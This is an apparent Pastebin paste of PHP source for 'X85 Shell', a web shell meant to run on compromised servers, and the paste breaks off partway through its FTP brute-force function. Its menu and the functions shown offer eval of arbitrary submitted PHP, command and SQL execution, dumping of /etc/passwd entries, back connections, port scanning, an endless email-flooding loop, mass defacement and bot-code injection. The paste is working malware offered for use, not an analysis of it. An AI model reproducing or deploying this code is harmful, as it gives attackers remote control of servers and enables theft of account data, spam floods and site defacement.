API tools faq
paste
Guest User

Untitled

a guest
Nov 27th, 2015
9,216
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 59.88 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. if($_GET['act'] == "phpinfo" and function_exists("phpinfo") and is_callable("phpinfo")){ phpinfo(); die(); }
  3.  
  4. $a = explode(" ",microtime());
  5. $StartTime = $a[0] + $a[1];
  6.  
  7. @error_reporting(5);
  8. @ignore_user_abort(TRUE);
  9. @set_magic_quotes_runtime(0);
  10.  
  11. $X85 = new X85($StartTime);
  12. class X85{
  13.     function X85($StartTime){
  14.         $ver = "1.0 Beta";
  15.         $this->phpv = @phpversion();
  16.         $prefix = " ".chr("187").chr("187")." ";
  17.         $suffix = NULL;
  18.         $safemodestatus = $this->SafeModeStatus();
  19.  
  20.         echo <<<END
  21. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  22. <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
  23.  
  24.     <head>
  25.    
  26.         <title>
  27.        
  28.             X85 Shell
  29.        
  30.         </title>
  31.    
  32.         <style type="text/css">
  33.        
  34.             html
  35.             {
  36.                 overflow-x: auto;
  37.             }
  38.  
  39.             body
  40.             {
  41.                 background: #111111;
  42.                 color: #FFFFFF;
  43.                 margin: 7px;
  44.                 padding: 7px;
  45.                 font-family: Verdana;
  46.                 font-size: 11px;
  47.             }
  48.  
  49.             .ServerInfoTitle
  50.             {
  51.                 text-decoration:underline;
  52.             }
  53.  
  54.             .HashName
  55.             {
  56.                 text-decoration:underline;
  57.             }
  58.  
  59.             textarea
  60.             {
  61.                 width:500px;
  62.             }
  63.  
  64.             .PageTitle
  65.             {
  66.                 font-size:8pt;
  67.                 font-weight:Bold;
  68.                 text-decoration:underline;
  69.             }
  70.  
  71.             table, td, tr
  72.             {
  73.                 border: 0;
  74.             }
  75.  
  76.             form
  77.             {
  78.                 padding: 0;
  79.                 margin: 0;
  80.             }
  81.  
  82.             input, select, textarea
  83.             {
  84.                 background: #999999;
  85.                 border: 1px solid #555555;
  86.                 font-family: Verdana;
  87.                 font-size: 10px;
  88.             }
  89.  
  90.             .wrapper
  91.             {
  92.                 background: #300000;
  93.                 border: 1px outset #666666;
  94.                 padding: 3px;
  95.                 text-align: left;
  96.             }
  97.  
  98.             a:link, a:visited, a:active
  99.             {
  100.                 font-family: Verdana;
  101.                 background: transparent;
  102.                 color: #e3e2e2;
  103.                 text-decoration: none;
  104.             }
  105.  
  106.             a:hover
  107.             {
  108.                 font-family: Verdana;
  109.                 background: transparent;
  110.                 color: #1774ba;
  111.             }
  112.  
  113.             .folder
  114.             {
  115.                 background: transparent;
  116.                 border-bottom: 1px solid #200000;
  117.             }
  118.  
  119.             .title
  120.             {
  121.                 text-align: center;
  122.             }
  123.  
  124.             .info
  125.             {
  126.                 text-align: left;
  127.             }
  128.  
  129.             .copyright
  130.             {
  131.                 text-align: center;
  132.                 font-size: 10px;
  133.             }
  134.  
  135.             .nav
  136.             {
  137.                 float: right;
  138.                 font-size: 9px;
  139.             }
  140.            
  141.        
  142.         </style>
  143.    
  144.     </head>
  145.    
  146.     <body>
  147.        
  148.         <div class="wrapper">
  149.  
  150.        
  151.             <center>
  152.            
  153.                 <h1>X85 Shell v.{$ver}</h1>
  154.                
  155.             </center>
  156.            
  157.             <hr><br />
  158.        
  159.             <div class="info">
  160.  
  161.                 Safe Mode: {$safemodestatus}
  162.  
  163.                 <br />
  164.  
  165.                 Software: <b>{$_SERVER['SERVER_SOFTWARE']}</b>
  166.                
  167.                 <br />
  168.            
  169.                 PHP Version: <b>{$this->phpv}</b>
  170.                
  171.                 <br />
  172.        
  173.             </div>
  174.    
  175.         </div>
  176.  
  177.             <br />
  178.  
  179.         <table style="width:100%;">
  180.             <tr>
  181.                 <td style="width:200px;vertical-align:top;" class="wrapper">
  182.                     <a href="?act=list">{$prefix}List Directories & Files{$suffix}</a><br />
  183.                     <a href="?act=info">{$prefix}View Server Information{$suffix}</a><br />
  184.                     <a href="?act=phpinfo">{$prefix}View PHP Information{$suffix}</a><br />
  185.                     <a href="?act=phpbugs">{$prefix}View PHP Bugs{$suffix}</a><br />
  186.                     <a href="?act=apachebugs">{$prefix}View Apache Bugs{$suffix}</a><br />
  187.                     <a href="?act=ep">{$prefix}Read /etc/passwd (Bypass){$suffix}</a><br />
  188.                     <a href="?act=readfiles"><s>{$prefix}Read Files (Bypass){$suffix}</s></a><br />
  189.                     <a href="?act=phpcode">{$prefix}PHP Codes Execution{$suffix}</a><br />
  190.                     <a href="?act=sqlcode">{$prefix}SQL Queries Execution{$suffix}</a><br />
  191.                     <a href="?act=cmdexec">{$prefix}Commands Execution{$suffix}</a><br />
  192.                     <a href="?act=pass">{$prefix}Pass Server Protections{$suffix}</a><br />
  193.                     <a href="?act=back">{$prefix}Bind Back Connections{$suffix}</a><br />
  194.                     <a href="?act=openports">{$prefix}Open Ports Scanner{$suffix}</a><br />
  195.                     <a href="?act=ftp">{$prefix}Online FTP BruteForce{$suffix}</a><br />
  196.                     <a href="?act=mail">{$prefix}Online E-Mails Flooder{$suffix}</a><br />
  197.                     <a href="?act=encoder">{$prefix}Professional Encoder{$suffix}</a><br />
  198.                     <a href="?act=mass">{$prefix}Mass Defacer{$suffix}</a><br />
  199.                     <a href="?act=bot">{$prefix}Inject bot code{$suffix}</a><br />
  200.                     <a href="?act=uhnav">{$prefix}Users Host Navigation{$suffix}</a><br />
  201.                     <a href="?act=remove">{$prefix}Self Remover{$suffix}</a><br />
  202.                 </td>
  203.            
  204.                 <td class="wrapper" style="vertical-align:top;">
  205.  
  206. END;
  207.  
  208.         switch($_GET['act']){
  209.             default: echo($this->ListDir($_GET['dir'])); break;
  210.             case 'info': echo($this->Details()); break;
  211.             case 'phpinfo': echo($this->ViewPHPInfo()); break;
  212.             case 'phpbugs': echo($this->ViewPHPBugs()); break;
  213.             case 'apachebugs': echo($this->ViewApacheBugs()); break;
  214.             case 'ep': echo($this->EtcPasswd()); break;
  215.             case 'phpcode': echo($this->PHPCode()); break;
  216.             case 'sqlcode': echo($this->SQLCode()); break;
  217.             case 'cmdexec': echo($this->CommandExecute()); break;
  218.             case 'ftp': echo($this->FTPBruteForce()); break;
  219.             case 'pass': echo($this->PassServerProtections()); break;
  220.             case 'back': echo($this->BackConnection()); break;
  221.             case 'openports' : echo($this->OpenPortsScanner()); break;
  222.             case 'mail': echo($this->MailFlooder()); break;
  223.             case 'encoder': echo($this->Encoder()); break;
  224.             case 'mass': echo($this->MassDefacer()); break;
  225.             case 'bot' : echo($this->BotCode()); break;
  226.             case 'uhnav': echo($this->UHNav()); break;
  227.             case 'remove' : echo($this->SelfRemove()); break;
  228.         }
  229.  
  230.         $a = explode(" ",microtime());
  231.         $EndTime = substr($a[0] + $a[1] - $StartTime,0,6);
  232.  
  233.         echo <<<END
  234.         </td>
  235.             </tr>
  236.                 </table>
  237.             <br />
  238.  
  239.         <div class="copyright">
  240.             Programmed by Hyp3rInj3cT10n & Pr0T3cT10n &copy; 2007<br /><br />
  241.             [ Execution Time: {$EndTime} ] [ Shell Version: {$ver} ]<br />
  242.         </div>
  243.  
  244.     </body>
  245.  
  246. </html>
  247. END;
  248.     }
  249.  
  250.     function EtcPasswd(){
  251.         $end = ($_GET['end'] > 0) ? $_GET['end'] : 5000 ;
  252.         $result = "<span class=\"PageTitle\">Read /etc/passwd (Bypass)</span><br /><br />";
  253.         $result .= "Read first: <input type=\"text\" id=\"first\" value=\"".$end."\" /> <input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Read\" onclick=\"javascript:location.replace('?act=ep&end='+document.getElementById('first').value);\" /><br /><br />\n";
  254.         $result .= "Trying to get /etc/passwd....";
  255.         if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid")){
  256.             $result .= "<span style=\"color:green;font-weight:Bold;\">Done!</span>";
  257.             $result .= '<br /><br /><table style="width:100%;"><tr><th>name</th><th>passwd</th><th>uid</th><th>gid</th><th>gecos</th><th>dir</th><th>shell</th></tr>';
  258.             for($x=0;$x<$end;$x++){
  259.                 $details = posix_getpwuid($x);
  260.                 if($details['name'])
  261.                     $result .= '<tr><td>'.$details['name'].'</td><td>'.$details['passwd'].'</td><td>'.$details['uid'].'</td><td>'.$details['gid'].'</td><td>'.$details['gecos'].'</td><td>'.$details['dir'].'</td><td>'.$details['shell'].'</td></tr>';
  262.             }
  263.             $result .= '</table>';
  264.         }
  265.         else $result .= "<span style=\"color:red;font-weight:Bold;\">Failed.</span>";
  266.  
  267.         return $result;
  268.     }
  269.  
  270.     function SafeModeStatus(){
  271.         if(function_exists("ini_get") and is_callable("ini_get"))
  272.             if(ini_get('safe_mode') == "1" or strtoupper(ini_get('safe_mode')) == "ON")
  273.                 return "<span style=\"color:red;font-weight:Bold;\">On</span>";
  274.             else
  275.                 return "<span style=\"color:green;font-weight:Bold;\">Off</span>";
  276.         else
  277.             return "<span style=\"color:gray;font-weight:Bold;\">Unknown</span>";
  278.     }
  279.  
  280.     function OpenBaseDirStatus(){
  281.         if(function_exists("ini_get") and is_callable("ini_get"))
  282.             if(strlen(ini_get('open_basedir')) > 3)
  283.                 return "<span style=\"color:red;font-weight:Bold;\">On</span>";
  284.             else
  285.                 return "<span style=\"color:green;font-weight:Bold;\">Off</span>";
  286.         else
  287.             return "<span style=\"color:gray;font-weight:Bold;\">Unknown</span>";
  288.     }
  289.  
  290.     function Details(){
  291.         $result = "<span class=\"PageTitle\">View Server Information</span><br /><br />";
  292.  
  293.         $result .= "<span class=\"ServerInfoTitle\">Safe Mode:</span> ".$this->SafeModeStatus()."<br />\n";
  294.         $result .= "<span class=\"ServerInfoTitle\">Open BaseDir:</span> ".$this->OpenBaseDirStatus()."<br />\n";
  295.  
  296.         $os = @php_uname();
  297.         $Functions = array(
  298.                     "PHP Version"       =>  "phpversion",
  299.                     "PHP Logo Guid"     =>  "php_logo_guid",
  300.                     "PHP Sapi Name"     =>  "php_sapi_name",
  301.                     "Zend Version"      =>  "zend_version",
  302.                     "Zend Logo Guid"        =>  "zend_logo_guid",
  303.                     "Apache Version"        =>  "apache_get_version",
  304.                     "Current User"      =>  "get_current_user",
  305.                     "Current Gid"       =>  "getmygid",
  306.                     "Current Uid"       =>  "getmyuid",
  307.                     "Current Pid"       =>  "getmypid",
  308.                     "Current Inode"     =>  "getmyinode",
  309.                     "Operation System Info" =>  "php_uname",
  310.                 );
  311.  
  312.         foreach($Functions as $desc=>$func)
  313.             if(function_exists($func) and is_callable($func))
  314.                 $result .= "<span class=\"ServerInfoTitle\">".$desc.":</span> ".@$func()."<br />\n";
  315.  
  316.         //Operation System Name
  317.         if(defined("PHP_OS")){
  318.             $result .= "<span class=\"ServerInfoTitle\">Operation System:</span> ".PHP_OS."<br />\n";
  319.             $os = PHP_OS;
  320.         }
  321.  
  322.         //Server Software
  323.         if(isset($_SERVER['SERVER_SOFTWARE']) and strlen($_SERVER['SERVER_SOFTWARE']) > 0)
  324.             $result .= "<span class=\"ServerInfoTitle\">Server Software:</span> ".$_SERVER['SERVER_SOFTWARE']."<br />\n";
  325.  
  326.         //Server IP
  327.         $result .= "<span class=\"ServerInfoTitle\">Server IP Address:</span> ".$_SERVER['SERVER_ADDR']."<br />\n";
  328.  
  329.         //Loaded Modules
  330.         if(function_exists("apache_get_modules") and is_callable("apache_get_modules")){
  331.             $result .= "<span class=\"ServerInfoTitle\">Loaded Modules:</span> ";
  332.             $count_modules = 0;
  333.             foreach(apache_get_modules() as $module){
  334.                 $result .= $module;
  335.  
  336.                 if($count_modules == count(apache_get_modules())-1)
  337.                     $result.= ".";
  338.                 else
  339.                     $result.= ", ";
  340.  
  341.                 $count_modules++;
  342.             }
  343.  
  344.             $result .= "<br />\n";
  345.             $result .= "<span class=\"ServerInfoTitle\">Total Loaded Modules:</span> ".$count_modules."<br />\n";
  346.         }
  347.  
  348.         //Loaded Extensions
  349.         if(function_exists("get_loaded_extensions") and is_callable("get_loaded_extensions")){
  350.             $result .= "<span class=\"ServerInfoTitle\">Loaded Extensions:</span> ";
  351.             $count_ext = 0;
  352.             foreach(get_loaded_extensions() as $module){
  353.                 $result .= $module;
  354.  
  355.                 if($count_ext == count(get_loaded_extensions())-1)
  356.                     $result.= ".";
  357.                 else
  358.                     $result.= ", ";
  359.  
  360.                 $count_ext++;
  361.             }
  362.  
  363.             $result .= "<br />\n";
  364.             $result .= "<span class=\"ServerInfoTitle\">Total Loaded Extensions:</span> ".$count_ext."<br />\n";
  365.         }
  366.  
  367.         //Main Path
  368.         $path = (eregi("win",strtolower($os))) ? "C:" : "/" ;
  369.  
  370.         //Total Disk Space
  371.         if(function_exists("disk_total_space") and is_callable("disk_total_space")){
  372.             $Total = substr(disk_total_space($path) / 1024 / 1024 / 1024,0,4);
  373.             $result .= "<span class=\"ServerInfoTitle\">Total Disk Space:</span> ".$Total." GB<br />";
  374.         }
  375.  
  376.         //Free Disk Space
  377.         if(function_exists("disk_free_space") and is_callable("disk_free_space")){
  378.             $FreeFunc = "disk_free_space";
  379.             $Free = substr(disk_free_space($path) / 1024 / 1024 / 1024,0,4);
  380.             $result .= "<span class=\"ServerInfoTitle\">Free Disk Space:</span> ".$Free." GB";
  381.         }
  382.         else{
  383.             if(function_exists("diskfreespace") and is_callable("diskfreespace")){
  384.                 $FreeFunc = "diskfreespace";
  385.                 $Free = substr(diskfreespace($path) / 1024 / 1024 / 1024,0,4);
  386.                 $result .= "<span class=\"ServerInfoTitle\">Free Disk Space:</span> ".$Free." GB";
  387.             }
  388.         }
  389.  
  390.         //Free Disk Space In Percents
  391.         if(eregi("Free",$result) and eregi("Total",$result))
  392.             $result .= " (".substr($FreeFunc($path) * 100 / disk_total_space($path),0,4)."% Free)";
  393.         $result .= "<br />\n";
  394.  
  395.         //Drivers
  396.         if($path != "/"){
  397.             $result .= "<span class=\"ServerInfoTitle\">Detected Drivers:</span> ";
  398.             $count = 1;
  399.             $Drivers = array();
  400.  
  401.             foreach(range("a","z") as $driver)
  402.                 if(is_dir($driver.":\\"))
  403.                     $Drivers[] = $driver;
  404.  
  405.             foreach($Drivers as $driver){
  406.                 $result .= $driver;
  407.  
  408.                 if($count == count($Drivers))
  409.                     $result .= ".";
  410.                 else
  411.                     $result .= ", ";
  412.                 $count++;
  413.             }
  414.         }
  415.  
  416.         return $result;
  417.     }
  418.  
  419.     function Encoder(){
  420.         $result = "<span class=\"PageTitle\">Professional Encoder</span><br /><br />";
  421.  
  422.         $string = stripslashes($_POST['encodetxt']);
  423.         $result .= "<form method=\"post\" action=\"?act=encoder\">\n";
  424.         $result .= "Text:<br />\n";
  425.         $result .= "<textarea class=\"HashesResults\" rows=\"5\" cols=\"40\" id=\"encodetxt\" name=\"encodetxt\">".htmlspecialchars($string)."</textarea><br />\n";
  426.         $result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Encode!\" /><br />\n</form>\n";
  427.  
  428.         if(isset($_POST['submit'])){
  429.             if(function_exists("hash_algos") and is_callable("hash_algos") and function_exists("hash") and is_callable("hash")){
  430.                 $Hashes = hash_algos();
  431.  
  432.                 foreach($Hashes as $hash){
  433.                     $rs = @hash($hash,$string);
  434.                     $result .= "<hr /><b>".$hash.": (".strlen($rs)." letters)</b><br /><textarea class=\"HashesResults\" rows=\"1\" cols=\"1\">".$rs."</textarea><br />\n";
  435.                 }
  436.             }
  437.  
  438.             $More = array(
  439.                     "MD5"       =>      "md5",
  440.                     "Sha1"      =>      "sha1",
  441.                     "Crc32"     =>      "crc32",
  442.                     "Crypt"     =>      "crypt",
  443.                     "Base64 Encode" =>      "base64_encode",
  444.                     "Base64 Decode" =>      "base64_decode",
  445.                     "UU Encode" =>      "convert_uuencode",
  446.                     "UU Decode" =>      "convert_uudecode",
  447.                     "URL Encode"    =>      "urlencode",
  448.                     "URL Decode"    =>      "urldecode",
  449.                     "RawURL Encode" =>      "rawurlencode",
  450.                     "RawURL Decode" =>      "rawurldecode",
  451.                     "UTF-8 Encode"  =>      "utf8_encode",
  452.                     "UTF-8 Decode"  =>      "utf8_decode",
  453.                     "Shuffle"       =>      "str_shuffle",
  454.                     "Reverse"   =>      "str_rev",
  455.                     "Rot13"     =>      "str_rot13",
  456.                 );
  457.             foreach($More as $name=>$func)
  458.                 if(function_exists($func) and is_callable($func))
  459.                     if(!in_array($func,$Hashes)){
  460.                         $rs = htmlspecialchars(@$func($string));
  461.                         $result .= "<hr /><b>".strtolower($name).": (".strlen($rs)." letters)</b><br /><textarea class=\"HashesResults\" rows=\"1\" cols=\"1\">".$rs."</textarea><br />\n";
  462.                     }
  463.         }
  464.         return $result;
  465.     }
  466.  
  467.     function PHPCode(){
  468.         ob_start();
  469.  
  470.         $result = "<span class=\"PageTitle\">PHP Codes Execution</span><br /><br />\n";
  471.         $result .= "<form method=\"post\" action=\"?act=phpcode\">";
  472.         $result .= "Code:<br /><textarea rows=\"5\" cols=\"50\" id=\"code\" name=\"code\">".htmlspecialchars(stripslashes($_POST['code']))."</textarea><br />";
  473.         $result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Execute\" />\n</form><br />";
  474.  
  475.         $eval = (isset($_POST['code'])) ? stripslashes($_POST['code']) : "";
  476.         if($eval != ""){
  477.             eval($eval);
  478.             $eresult = ob_get_contents();
  479.             $result .= "<textarea rows=\"5\" cols=\"50\" readonly=\"readonly\">".htmlspecialchars($eresult)."</textarea>";
  480.         }
  481.  
  482.         ob_end_clean();
  483.  
  484.         return $result;
  485.     }
  486.  
  487.     function SQLCode(){
  488.         $host = (isset($_POST['host'])) ? stripslashes($_POST['host']) : "localhost" ;
  489.         $username = (isset($_POST['username'])) ? stripslashes($_POST['username']) : "root" ;
  490.         $password = (isset($_POST['password'])) ? stripslashes($_POST['password']) : "" ;
  491.         $database = (isset($_POST['database'])) ? stripslashes($_POST['database']) : "" ;
  492.         $query = (isset($_POST['code'])) ? stripslashes($_POST['code']) : "" ;
  493.  
  494.         $result = "<span class=\"PageTitle\">SQL Queries Execution</span><br /><br />\n";
  495.         $result .= "<form method=\"post\" action=\"?act=sqlcode\">";
  496.         $result .= "Host: <input type=\"text\" id=\"host\" name=\"host\" value=\"".$host."\" /><br /><br />\n";
  497.         $result .= "Username: <input type=\"text\" id=\"username\" name=\"username\" value=\"".htmlspecialchars($username)."\" /><br /><br />\n";
  498.         $result .= "Password: <input type=\"text\" id=\"password\" name=\"password\" value=\"".htmlspecialchars($password)."\" /><br /><br />\n";
  499.         $result .= "Database: <input type=\"text\" id=\"database\" name=\"database\" value=\"".htmlspecialchars($database)."\" /><br /><br />\n";
  500.         $result .= "Query:<br /><textarea rows=\"5\" cols=\"50\" id=\"code\" name=\"code\">".htmlspecialchars(stripslashes($_POST['code']))."</textarea><br />";
  501.         $result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Execute\" />\n</form><br />";
  502.  
  503.         if(isset($_POST['submit']))
  504.             if(!@mysql_connect($host,$username,$password))
  505.                 $result .= "Error: ".htmlspecialchars(mysql_error());
  506.             else
  507.                 if(!@mysql_select_db($database))
  508.                     $result .= "Error: ".htmlspecialchars(mysql_error());
  509.                 else
  510.                     if(!@$Q=mysql_query($query))
  511.                         $result .= "Error: ".htmlspecialchars(mysql_error());
  512.                     else
  513.                         $result .= "Query Executed Successfuly.";
  514.  
  515.         return $result;
  516.     }
  517.  
  518.     function MailFlooder(){
  519.         $email = (isset($_POST['email'])) ? stripslashes($_POST['email']) : "" ;
  520.         $title = (isset($_POST['title'])) ? stripslashes($_POST['title']) : "" ;
  521.         $content = (isset($_POST['content'])) ? stripslashes($_POST['content']) : "" ;
  522.  
  523.         $result = "<span class=\"PageTitle\">Online E-Mails Flooder</span><br /><br />\n";
  524.         $result .= "<form method=\"post\" action=\"?act=sqlcode\">";
  525.         $result .= "To: <input type=\"text\" id=\"email\" name=\"email\" value=\"".htmlspecialchars($email)."\" /><br /><br />\n";
  526.         $result .= "Title: <input type=\"text\" id=\"title\" name=\"title\" value=\"".htmlspecialchars($title)."\" /><br /><br />\n";
  527.         $result .= "Content:<br /><textarea rows=\"5\" cols=\"50\" id=\"content\" name=\"content\">".htmlspecialchars(stripslashes($_POST['content']))."</textarea><br />";
  528.         $result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Flood\" />\n</form><br />";
  529.  
  530.         if(isset($_POST['submit'])){
  531.             if(function_exists("mail") and is_callable("mail")){
  532.                 $result .= "Flooding...";
  533.                 while(!$none) mail($email,$title,$content);
  534.                 $result .= "The specified E-Mail Address should be flooded.";
  535.             }
  536.             else{
  537.                 $result .= "Unable to send E-Mails.";
  538.             }
  539.         }
  540.         return $result;
  541.     }
  542.  
  543.     function SelfRemove(){
  544.         $result = "<span class=\"PageTitle\">Self Remover</span><br /><br />";
  545.  
  546.         if($_GET['confirmed'] == "true")
  547.             if(@unlink(__FILE__))
  548.                 $result .= "Removed Successfully!";
  549.             else
  550.                 $result .= "Can't remove myself, there are not enough permissions.";
  551.         else
  552.             $result .= "Are you sure? <a href=\"?act=remove&confirmed=true\">Yes</a> <a href=\"?\">No</a>";
  553.         return $result;
  554.     }
  555.  
  556.     function OpenPortsScanner(){
  557.         $rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
  558.         $rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
  559.         echo("<script type=\"text/javascript\">");
  560.         echo("function Show(SelectValue){");
  561.         echo("document.getElementById('RangeDiv').style.display=\"none\";");
  562.         echo("document.getElementById('SpecificDiv').style.display=\"none\";");
  563.         echo("if(SelectValue == \"range\")");
  564.         echo("document.getElementById('RangeDiv').style.display=\"inline\";");
  565.         echo("if(SelectValue == \"specific\")");
  566.         echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
  567.         echo("}</script>");
  568.         echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
  569.         echo('<form method="post" action="?act=openports">');
  570.         echo('<u>Ports:</u><br /><br />');
  571.         echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
  572.         echo('<option value="automatic">Automatic - All Ports</option>');
  573.         echo('<option value="range">Range of Ports</option>');
  574.         echo('<option value="specific">Specific Ports</option>');
  575.         echo('</select><br /><br />');
  576.         echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
  577.         echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
  578.         echo('<input type="submit" id="submit" name="submit" value="Scan" />');
  579.         echo('</form>');
  580.         if(isset($_POST['submit'])){
  581.             $first = "yes";
  582.             echo("<br /><br /><u>Results</u>:<br />\n");
  583.  
  584.             if($_POST['port'] == "range"){
  585.                 if($rend > $rstart){
  586.                     for($i=$rstart;$i<$rend;$i++){
  587.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  588.                             if($first == "no")
  589.                                 echo(", ");
  590.                             echo $i;
  591.                             $first = "no";
  592.                         }
  593.                     }
  594.                     echo(".");
  595.                 }
  596.                 else{
  597.                     echo("Range start number can't be bigger than the end number.");
  598.                 }
  599.             }
  600.             else if($_POST['port'] == "specific"){
  601.                 $list = explode(" ",$_POST['specific']);
  602.                 foreach($list as $i){
  603.                     if(is_numeric($i)){
  604.                         if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  605.                             if($first == "no")
  606.                                 echo(", ");
  607.                             echo $i;
  608.                             $first = "no";
  609.                         }
  610.                     }
  611.                 }
  612.                 echo(".");
  613.             }
  614.             else{
  615.                 for($i=0;$i>=0;$i++){
  616.                     if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
  617.                         if($first == "no")
  618.                             echo(", ");
  619.                         echo $i;
  620.                         $first = "no";
  621.                     }
  622.                 }
  623.                 echo(".");
  624.             }
  625.         }
  626.     }
  627.  
  628.     function ListDir($dir){
  629.  
  630.         function LettersPerms($file){
  631.             $perms = @fileperms($file);
  632.  
  633.             if (($perms & 0xC000) == 0xC000) {
  634.                 // Socket
  635.                 $info = 's';
  636.             } elseif (($perms & 0xA000) == 0xA000) {
  637.                 // Symbolic Link
  638.                 $info = 'l';
  639.             } elseif (($perms & 0x8000) == 0x8000) {
  640.                 // Regular
  641.                 $info = '-';
  642.             } elseif (($perms & 0x6000) == 0x6000) {
  643.                 // Block special
  644.                 $info = 'b';
  645.             } elseif (($perms & 0x4000) == 0x4000) {
  646.                 // Directory
  647.                 $info = 'd';
  648.             } elseif (($perms & 0x2000) == 0x2000) {
  649.                 // Character special
  650.                 $info = 'c';
  651.             } elseif (($perms & 0x1000) == 0x1000) {
  652.                 // FIFO pipe
  653.                 $info = 'p';
  654.             } else {
  655.                 // Unknown
  656.                 $info = 'u';
  657.             }
  658.  
  659.             // Owner
  660.             $info .= (($perms & 0x0100) ? 'r' : '-');
  661.             $info .= (($perms & 0x0080) ? 'w' : '-');
  662.             $info .= (($perms & 0x0040) ?
  663.                         (($perms & 0x0800) ? 's' : 'x' ) :
  664.                         (($perms & 0x0800) ? 'S' : '-'));
  665.    
  666.             // Group
  667.             $info .= (($perms & 0x0020) ? 'r' : '-');
  668.             $info .= (($perms & 0x0010) ? 'w' : '-');
  669.             $info .= (($perms & 0x0008) ?
  670.                         (($perms & 0x0400) ? 's' : 'x' ) :
  671.                         (($perms & 0x0400) ? 'S' : '-'));
  672.  
  673.             // World
  674.             $info .= (($perms & 0x0004) ? 'r' : '-');
  675.             $info .= (($perms & 0x0002) ? 'w' : '-');
  676.             $info .= (($perms & 0x0001) ?
  677.                         (($perms & 0x0200) ? 't' : 'x' ) :
  678.                         (($perms & 0x0200) ? 'T' : '-'));
  679.  
  680.             return $info;
  681.         }
  682.  
  683.         if($dir == "") $dir = $_SERVER['DOCUMENT_ROOT'].dirname($_SERVER['PHP_SELF'])."/";
  684.  
  685.         $result = "<span class=\"PageTitle\">List Directories & Files</span><br /><br />";
  686.         $result .= "Trying to list directory: ";
  687.         $Pathes = explode("/",$dir);
  688.         $lastpath = NULL;
  689.         foreach($Pathes as $k=>$path){
  690.             if($path != "" or $k == "0"){
  691.                 $path .= "/";
  692.                 $result .= "<a href=\"?act=list&dir=".$lastpath.$path."\">".$path."</a>";
  693.                 $lastpath .= $path;
  694.             }
  695.         }
  696.  
  697.         $result .= "<br /><br />\n";
  698.         $result .= "<table style=\"width:100%;\"><tr><th>Name</th><th>Size</th><th>Last Modified</th><th>Permissions</th><th>Actions</th></tr>";
  699.  
  700.         if(dirname($dir) != str_replace("\/","",$dir))
  701.                 $result .= "<tr>\n";
  702.                 $result .= "<td><a href=\"?act=list&dir=".dirname($dir)."/\">..</a></td>\n";
  703.                 $result .= "<td> - </td>\n";
  704.                 $result .= "<td>&nbsp;</td>\n";
  705.                 $result .= "<td>".@fileperms(dirname($dir))." (".LettersPerms(dirname($dir)).")"."</td>\n";
  706.                 $result .= "<td>&nbsp;</td>\n";
  707.                 $result .= "</tr>\n";
  708.  
  709.         $glob = $dir."*";
  710.         $files = glob($glob);
  711.         foreach($files as $name){
  712.             $FileDir = dirname($name)."/";
  713.             $FileName = basename($name);
  714.  
  715.             if(is_dir($FileDir.$FileName)){
  716.                 $result .= "<tr>\n";
  717.                 $result .= "<td><a href=\"?act=list&dir=".$FileDir.$FileName."/\">".$FileName."/</a></td>\n";
  718.                 $result .= "<td> - </td>\n";
  719.                 $result .= "<td>&nbsp;</td>\n";
  720.                 $result .= "<td>".@fileperms($FileDir.$FileName)." (".@LettersPerms($FileDir.$FileName).")"."</td>\n";
  721.                 $result .= "<td>&nbsp;</td>\n";
  722.                 $result .= "</tr>\n";
  723.             }
  724.             else{
  725.                 $result .= "<tr>\n";
  726.                 $result .= "<td><a href=\"?act=viewfi?le&dir=".$FileDir."/&file=".$FileName."\">".$FileName."</a></td>\n";
  727.                 $result .= "<td>".substr(filesize($FileDir.$FileName) / 1024,0,6)." KB</td>\n";
  728.                 $result .= "<td>&nbsp;</td>\n";
  729.                 $result .= "<td>".@fileperms($FileDir.$FileName)." (".@LettersPerms($FileDir.$FileName).")"."</td>\n";
  730.                 $result .= "<td>&nbsp;</td>\n";
  731.                 $result .= "</tr>\n";
  732.             }
  733.         }
  734.  
  735.         $result .= "</table><br /><br />\n";
  736.         $result .= "<fieldset>\n";
  737.         $result .= "<legend>More Options:</legend>\n";
  738.         $result .= "<form method=\"post\">\n";
  739.         $result .= "Jump To Directory: <input type=\"text\" id=\"jdir\" style=\"width:300px\" value=\"".htmlspecialchars($dir)."\"> <input type=\"button\" value=\"Jump\" onclick=\"javascript:location.replace('?act=list&dir='+document.getElementById('jdir').value);\" /><br /><br />\n";
  740.         $result .= "Create Directory: <input type=\"text\" id=\"cdir\" style=\"width:100px;\" name=\"cdir\" value=\"".htmlspecialchars($_POST['cdir'])."\"> <input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Create\" /><br />\n";
  741.         $result .= "</form></fieldset><br />\n";
  742.  
  743.         return $result;
  744.     }
  745.  
  746.     function FTPBruteForce(){
  747.         echo("<span class=\"PageTitle\">Online FTP BruteForce</span><br /><br />");
  748.         $_POST['usernames'] = htmlspecialchars($_POST['usernames']);
  749.         $_POST['passwords'] = htmlspecialchars($_POST['passwords']);
